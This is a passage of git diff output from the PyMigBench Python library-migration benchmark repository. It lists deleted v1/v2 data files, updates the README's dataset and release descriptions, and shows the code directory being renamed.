v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py delete mode 100644 v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff delete mode 100644 v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py delete mode 100644 v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py delete mode 100644 v1/data/libpair/appdirs,platformdirs.yaml delete mode 100644 v1/data/libpair/argparse,configargparse.yaml delete mode 100644 v1/data/libpair/attr,attrs.yaml delete mode 100644 v1/data/libpair/celery,rq.yaml delete mode 100644 v1/data/libpair/cheetah,cheetah3.yaml delete mode 100644 v1/data/libpair/dataproperty,typepy.yaml delete mode 100644 v1/data/libpair/django-registration,django-registration-redux.yaml delete mode 100644 v1/data/libpair/django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/libpair/dotenv,python-dotenv.yaml delete mode 100644 v1/data/libpair/eventlet,gevent.yaml delete mode 100644 v1/data/libpair/flask,fastapi.yaml delete mode 100644 v1/data/libpair/flask,quart.yaml delete mode 100644 v1/data/libpair/flask,uvicorn.yaml delete mode 100644 v1/data/libpair/flask-restful,flask-restplus.yaml delete mode 100644 v1/data/libpair/flask-restplus,flask-restx.yaml delete mode 100644 v1/data/libpair/flask-security,flask-security-too.yaml delete mode 100644 v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/libpair/gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/libpair/gevent,eventlet.yaml delete mode 100644 v1/data/libpair/gunicorn,waitress.yaml delete mode 100644 v1/data/libpair/huey,celery.yaml delete mode 100644 v1/data/libpair/jwt,pyjwt.yaml delete mode 100644 v1/data/libpair/kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/libpair/keras,torch.yaml delete mode 100644 v1/data/libpair/lockfile,fasteners.yaml delete mode 100644 v1/data/libpair/logbook,loguru.yaml delete mode 100644 v1/data/libpair/magic,python-magic.yaml delete mode 100644 v1/data/libpair/mysql-python,mysqlclient.yaml delete mode 100644 v1/data/libpair/mysql-python,pymysql.yaml delete mode 100644 v1/data/libpair/mysqlclient,psycopg2.yaml delete mode 100644 v1/data/libpair/openpyxl,xlsxwriter.yaml delete mode 100644 v1/data/libpair/pandas,numpy.yaml delete mode 100644 v1/data/libpair/pil,pillow.yaml delete mode 100644 v1/data/libpair/pillow,torchvision.yaml delete mode 100644 v1/data/libpair/py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/libpair/pycrypto,cryptography.yaml delete mode 100644 v1/data/libpair/pycrypto,pycryptodome.yaml delete mode 100644 v1/data/libpair/pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/libpair/pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/libpair/pyqt5,pyside6.yaml delete mode 100644 v1/data/libpair/python-ldap,ldap3.yaml delete mode 100644 v1/data/libpair/python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/libpair/pytz,pendulum.yaml delete mode 100644 v1/data/libpair/pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/libpair/raven,sentry-sdk.yaml delete mode 100644 v1/data/libpair/requests,aiohttp.yaml delete mode 100644 v1/data/libpair/retrying,tenacity.yaml delete mode 100644 v1/data/libpair/ruamel.yaml,pyyaml.yaml delete mode 100644 v1/data/libpair/s3cmd,awscli.yaml delete mode 100644 v1/data/libpair/scapy-python3,scapy.yaml delete mode 100644 v1/data/libpair/sklearn,torch.yaml delete mode 100644 v1/data/libpair/slackclient,slack-sdk.yaml delete mode 100644 v1/data/libpair/slugify,python-slugify.yaml delete mode 100644 v1/data/libpair/tensorboard,tensorboardx.yaml delete mode 100644 v1/data/libpair/urllib,urllib3.yaml delete mode 100644 v1/data/libpair/uwsgi,gunicorn.yaml delete mode 100644 v1/data/libpair/websocket-client,tornado.yaml delete mode 100644 v1/data/libpair/xlrd,openpyxl.yaml delete mode 100644 v1/data/libpair/xlsxwriter,openpyxl.yaml delete mode 100644 v1/data/migration/002f5bd_flask,quart.yaml delete mode 100644 v1/data/migration/0171fb9_pil,pillow.yaml delete mode 100644 v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/03a9621_s3cmd,awscli.yaml delete mode 100644 v1/data/migration/0411d6a_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/047263b_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/04a5913_pil,pillow.yaml delete mode 100644 v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/migration/08e7ffa_gunicorn,waitress.yaml delete mode 100644 v1/data/migration/0911992_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/0a65bcc_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/0a70f2b_flask,quart.yaml delete mode 100644 v1/data/migration/0d78d19_lockfile,fasteners.yaml delete mode 100644 v1/data/migration/0df86b5_logbook,loguru.yaml delete mode 100644 v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml delete mode 100644 v1/data/migration/14388c3_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/1c574c1_requests,aiohttp.yaml delete mode 100644 v1/data/migration/1d8923a_requests,aiohttp.yaml delete mode 100644 v1/data/migration/22cc3f0_flask,quart.yaml delete mode 100644 v1/data/migration/24a848d_flask,fastapi.yaml delete mode 100644 v1/data/migration/24a848d_flask,uvicorn.yaml delete mode 100644 v1/data/migration/26c8e74_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/27e2a46_pillow,torchvision.yaml delete mode 100644 v1/data/migration/2960ec6_argparse,configargparse.yaml delete mode 100644 v1/data/migration/2adc6a9_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/2c40713_pytz,pendulum.yaml delete mode 100644 v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/2fc0f26_pil,pillow.yaml delete mode 100644 v1/data/migration/311c7ce_logbook,loguru.yaml delete mode 100644 v1/data/migration/31212eb_pil,pillow.yaml delete mode 100644 v1/data/migration/33c7a3f_pytz,pendulum.yaml delete mode 100644 v1/data/migration/356ce56_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml delete mode 100644 v1/data/migration/35d8144_urllib,urllib3.yaml delete mode 100644 v1/data/migration/3abbc43_flask,fastapi.yaml delete mode 100644 v1/data/migration/3abbc43_flask,uvicorn.yaml delete mode 100644 v1/data/migration/3f786f4_uwsgi,gunicorn.yaml delete mode 100644 v1/data/migration/432afa4_jwt,pyjwt.yaml delete mode 100644 v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/migration/43e8ec2_celery,rq.yaml delete mode 100644 v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/migration/45fac3c_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/472f336_xlsxwriter,openpyxl.yaml delete mode 100644 v1/data/migration/49cf693_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/4c3400a_pil,pillow.yaml delete mode 100644 v1/data/migration/4fc081b_keras,torch.yaml delete mode 100644 v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml delete mode 100644 v1/data/migration/5169173_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/51f2688_gevent,eventlet.yaml delete mode 100644 v1/data/migration/528b986_jwt,pyjwt.yaml delete mode 100644 v1/data/migration/5393290_pil,pillow.yaml delete mode 100644 v1/data/migration/53f2073_requests,aiohttp.yaml delete mode 100644 v1/data/migration/547f6d9_lockfile,fasteners.yaml delete mode 100644 v1/data/migration/56e3253_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml delete mode 100644 v1/data/migration/58237dc_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/598f275_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/59d8319_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/migration/5c76c96_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/5cb810e_pil,pillow.yaml delete mode 100644 v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/5eb6909_eventlet,gevent.yaml delete mode 100644 v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/633e7d1_gevent,eventlet.yaml delete mode 100644 v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/6e7ee63_requests,aiohttp.yaml delete mode 100644 v1/data/migration/70b3abc_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/71aff3a_retrying,tenacity.yaml delete mode 100644 v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/migration/7811c8f_eventlet,gevent.yaml delete mode 100644 v1/data/migration/7ba8676_logbook,loguru.yaml delete mode 100644 v1/data/migration/7ea7ddb_flask,quart.yaml delete mode 100644 v1/data/migration/813214e_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/85d50bb_pil,pillow.yaml delete mode 100644 v1/data/migration/86244b6_pyqt5,pyside6.yaml delete mode 100644 v1/data/migration/8778a80_pil,pillow.yaml delete mode 100644 v1/data/migration/87a5671_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/89b64c6_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/8d0ec68_retrying,tenacity.yaml delete mode 100644 v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/902b66d_pil,pillow.yaml delete mode 100644 v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/936761f_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/9c85d66_pil,pillow.yaml delete mode 100644 v1/data/migration/a4c347a_eventlet,gevent.yaml delete mode 100644 v1/data/migration/a50812d_flask-security,flask-security-too.yaml delete mode 100644 v1/data/migration/a5c04bb_requests,aiohttp.yaml delete mode 100644 v1/data/migration/a688034_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/a7375cc_celery,rq.yaml delete mode 100644 v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/aa607bd_flask,quart.yaml delete mode 100644 v1/data/migration/ab4e5fd_requests,aiohttp.yaml delete mode 100644 v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/b2c9313_requests,aiohttp.yaml delete mode 100644 v1/data/migration/b687d20_huey,celery.yaml delete mode 100644 v1/data/migration/b86b375_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml delete mode 100644 v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/baca6bb_urllib,urllib3.yaml delete mode 100644 v1/data/migration/bbeb755_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/bed73dc_urllib,urllib3.yaml delete mode 100644 v1/data/migration/c08ec7a_huey,celery.yaml delete mode 100644 v1/data/migration/c77913a_eventlet,gevent.yaml delete mode 100644 v1/data/migration/c7c5a13_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/cbaf252_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/cc47b42_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/cdaff15_pycrypto,cryptography.yaml delete mode 100644 v1/data/migration/cdb6679_pil,pillow.yaml delete mode 100644 v1/data/migration/cec78f4_pil,pillow.yaml delete mode 100644 v1/data/migration/cf856c0_gevent,eventlet.yaml delete mode 100644 v1/data/migration/d10cb16_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/migration/d3a9a16_requests,aiohttp.yaml delete mode 100644 v1/data/migration/d3bedb7_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/d6cd8df_pyqt5,pyside6.yaml delete mode 100644 v1/data/migration/d707ff6_gevent,eventlet.yaml delete mode 100644 v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/dac43f8_gunicorn,waitress.yaml delete mode 100644 v1/data/migration/db7f132_flask,quart.yaml delete mode 100644 v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/migration/dd3b266_urllib,urllib3.yaml delete mode 100644 v1/data/migration/dec4ae0_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/df57533_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/e38ec14_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/e418cdc_pil,pillow.yaml delete mode 100644 v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/e706486_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/migration/ea23791_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/f0761b8_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/f08e9f1_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/f1120d3_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/f69877c_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/f970b54_pil,pillow.yaml delete mode 100644 v1/data/migration/fe6b437_pil,pillow.yaml delete mode 100644 v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml delete mode 100644 v2/code/.idea/.gitignore delete mode 100644 v2/code/.idea/PyMigStat.iml delete mode 100644 v2/code/.idea/inspectionProfiles/Project_Default.xml delete mode 100644 v2/code/.idea/inspectionProfiles/profiles_settings.xml delete mode 100644 v2/code/.idea/misc.xml delete mode 100644 v2/code/.idea/modules.xml delete mode 100644 v2/code/.idea/other.xml delete mode 100644 v2/code/.idea/vcs.xml delete mode 100644 v2/code/README.md delete mode 100644 v2/code/pymigstat/runnables/__init__.py delete mode 100644 v2/code/pymigstat/taxonomy/__init__.py diff --git a/README.md b/README.md index 5da97ea..da46f67 100644 --- a/README.md +++ b/README.md @@ -1,29 +1,24 @@ PyMigBench is a benchmark of Python Library Migrations. This repository contains the data and code for the dataset. - ## PyMigBench v2 -This is the latest version of the dataset. -This includes all data from [PyMigBench v1](#pymigbench-v1) and additional migrations borrowed from the [SALM dataset](https://ieeexplore.ieee.org/document/10123560). -The data also includes more information per migration-related code change. -The dataset includes 3,096 migration-related code changes from 335 migrations between 141 analogous library pairs. -The data is available in the [v2](/v2) directory. +The current version, PyMigBench-2.0, includes 3,096 migration-related code changes from 335 migrations between 141 analogous library pairs. +This includes all migrations from [PyMigBench v1](#pymigbench-v1) and additional migrations borrowed from the [SALM dataset](https://ieeexplore.ieee.org/document/10123560). +The data also includes additional information per migration-related code change compared to v1. -The paper is published in FSE 2024. +The dataset is published through the FSE 2024 paper titled *Characterizing Python Library Migrations*. We will add the citation info once it is available. -[Release 2.0.1](https://github.com/ualberta-smr/PyMigBench/releases/v2.0.1) points to the exact dataset linked to the paper. -We may update the [v2](/v2) directory to correct any mistakes or add more data and it may go out of sync with the paper. -So, for reproduction of the paper, use the release mentioned above. -For, the latest data, use the [v2](/v2) directory of the latest version of the repository. +[Release 2.0.2](https://github.com/ualberta-smr/PyMigBench/releases/v2.0.2) points to the exact dataset linked to the paper. +The data is also permanently archived in [figshare](https://doi.org/10.6084/m9.figshare.24216858.v2). +Use either of these links to reproduce the paper. +We may update this repository to correct any mistakes or add more data and it may not synch with the paper. +For, the latest data, use the [latest release](https://github.com/ualberta-smr/PyMigBench/releases/latest) in this repository. ## PyMigBench v1 -The 2023 version of the dataset includes 375 migration-related code changes from 75 migrations between 34 analogous library pairs. -The data is also available in the [v1](/v1) directory. -Please visit [the PyMigBench website](https://ualberta-smr.github.io/PyMigBench) for detailed instructions on using PyMigBench v1. -We recommend using [PyMigBench v2](#pymigbench-v2) for any new research, -however, if you are going to use this version, please cite the [MSR 2023 paper](https://ieeexplore.ieee.org/abstract/document/10174111) as below. -[Release 1.0.3](https://github.com/ualberta-smr/PyMigBench/releases/v1.0.3) points to the dataset linked to the paper. +We recommend using PyMigBench v2 for any new research. +However, you want to use the v1 dataset, you should look at [Release 1.0.3](https://github.com/ualberta-smr/PyMigBench/releases/v1.0.3). +Cite the paper below if you use the v1 dataset. ``` @INPROCEEDINGS{pymigbench, diff --git a/v2/code/.gitignore b/code/.gitignore similarity index 100% rename from v2/code/.gitignore rename to code/.gitignore diff --git a/v2/code/LICENSE b/code/LICENSE similarity index 100% rename from v2/code/LICENSE rename to code/LICENSE diff --git a/v2/code/configs/config.yaml b/code/configs/config.yaml similarity index 100% rename from v2/code/configs/config.yaml rename to code/configs/config.yaml diff --git a/v1/code/core/__init__.py b/code/pymigstat/__init__.py similarity index 100% rename from v1/code/core/__init__.py rename to code/pymigstat/__init__.py diff --git a/v1/code/query/__init__.py b/code/pymigstat/code_change_search/__init__.py similarity index 100% rename from v1/code/query/__init__.py rename to code/pymigstat/code_change_search/__init__.py diff --git a/v2/code/pymigstat/code_change_search/diff_meta_parser.py b/code/pymigstat/code_change_search/diff_meta_parser.py similarity index 100% rename from v2/code/pymigstat/code_change_search/diff_meta_parser.py rename to code/pymigstat/code_change_search/diff_meta_parser.py diff --git a/v2/code/pymigstat/code_change_search/find_code_changes.py b/code/pymigstat/code_change_search/find_code_changes.py similarity index 100% rename from v2/code/pymigstat/code_change_search/find_code_changes.py rename to code/pymigstat/code_change_search/find_code_changes.py diff --git a/v2/code/pymigstat/code_change_search/usage_resolver.py b/code/pymigstat/code_change_search/usage_resolver.py similarity index 100% rename from v2/code/pymigstat/code_change_search/usage_resolver.py rename to code/pymigstat/code_change_search/usage_resolver.py diff --git a/v2/code/pymigstat/complexity/__init__.py b/code/pymigstat/complexity/__init__.py similarity index 100% rename from v2/code/pymigstat/complexity/__init__.py rename to code/pymigstat/complexity/__init__.py diff --git a/v2/code/pymigstat/complexity/max_cardinality.py b/code/pymigstat/complexity/max_cardinality.py similarity index 100% rename from v2/code/pymigstat/complexity/max_cardinality.py rename to code/pymigstat/complexity/max_cardinality.py diff --git a/v2/code/pymigstat/complexity/mfiles_migration_complexity.py b/code/pymigstat/complexity/mfiles_migration_complexity.py similarity index 100% rename from v2/code/pymigstat/complexity/mfiles_migration_complexity.py rename to code/pymigstat/complexity/mfiles_migration_complexity.py diff --git a/v2/code/pymigstat/complexity/mig_loc.py b/code/pymigstat/complexity/mig_loc.py similarity index 100% rename from v2/code/pymigstat/complexity/mig_loc.py rename to code/pymigstat/complexity/mig_loc.py diff --git a/v2/code/pymigstat/complexity/migration_metric.py b/code/pymigstat/complexity/migration_metric.py similarity index 100% rename from v2/code/pymigstat/complexity/migration_metric.py rename to code/pymigstat/complexity/migration_metric.py diff --git a/v2/code/pymigstat/complexity/num_apis.py b/code/pymigstat/complexity/num_apis.py similarity index 100% rename from v2/code/pymigstat/complexity/num_apis.py rename to code/pymigstat/complexity/num_apis.py diff --git a/v2/code/pymigstat/complexity/num_changes.py b/code/pymigstat/complexity/num_changes.py similarity index 100% rename from v2/code/pymigstat/complexity/num_changes.py rename to code/pymigstat/complexity/num_changes.py diff --git a/v2/code/pymigstat/complexity/pe_set.py b/code/pymigstat/complexity/pe_set.py similarity index 100% rename from v2/code/pymigstat/complexity/pe_set.py rename to code/pymigstat/complexity/pe_set.py diff --git a/v2/code/pymigstat/complexity/prop_set.py b/code/pymigstat/complexity/prop_set.py similarity index 100% rename from v2/code/pymigstat/complexity/prop_set.py rename to code/pymigstat/complexity/prop_set.py diff --git a/v2/code/pymigstat/complexity/unique_apis.py 